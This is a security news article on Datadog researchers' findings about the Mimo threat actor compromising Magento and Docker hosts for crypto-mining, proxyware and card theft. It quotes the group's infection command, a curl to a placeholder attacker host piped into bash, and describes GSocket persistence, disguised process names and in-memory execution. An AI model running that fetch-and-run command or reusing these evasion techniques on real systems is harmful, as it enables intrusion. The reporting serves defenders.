Threat Actor Mimo Attacking Magento CMS to Steal Card Details and Bandwidth Monetization

The cybersecurity landscape faces a new threat as the notorious Mimo threat actor, previously known for targeting Craft content management systems, has significantly evolved its operations to compromise Magento ecommerce platforms.

This expansion represents a dangerous shift toward high-value targets where financial data information are routinely processed, marking a concerning escalation in the group’s criminal activities.

Mimo’s latest campaign demonstrates sophisticated technical capabilities, exploiting undetermined PHP-FPM vulnerabilities to gain initial access to Magento installations.

The threat actor has developed a multi-pronged monetization strategy that combines traditional cryptocurrency mining with bandwidth theft through residential proxy networks.

This dual approach allows the attackers to extract maximum value from compromised systems while maintaining persistent access to valuable ecommerce environments.

DATADOG Security Labs researchers identified this evolution during investigations into multiple workload compromises affecting ecommerce sites throughout 2025.

The security team discovered that Mimo had not only expanded its target scope but had also introduced advanced persistence mechanisms and sophisticated evasion techniques that significantly enhance the threat’s operational security and longevity on compromised systems.

The threat actor’s operations extend beyond Magento platforms, with researchers uncovering evidence of Docker container compromises through misconfigured Docker Engine API endpoints.

When targeting Docker environments, Mimo employs the command curl http://[adversary-controlled-infrastructure]/cron.jpg?docker | bash to initiate the infection chain, demonstrating the group’s adaptability across diverse infrastructure types.

Advanced Persistence and Evasion Mechanisms

Mimo’s most significant tactical advancement involves implementing GSocket, a legitimate penetration testing tool, for establishing persistent command and control channels.

This tool enables encrypted communication through the Global Socket Relay Network using AES-256-CBC encryption, effectively bypassing firewalls and network address translation barriers that would typically block malicious traffic.

The malware employs sophisticated process masquerading techniques, selecting random names from a hardcoded list including [kstrp], [watchdogd], [ksmd], and [kswapd0] to blend seamlessly with legitimate kernel processes.

Perhaps most concerning is Mimo’s implementation of the memfd_create() syscall, which creates anonymous temporary files directly in memory, allowing the malware to execute entirely without leaving traditional filesystem artifacts that security tools typically monitor.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now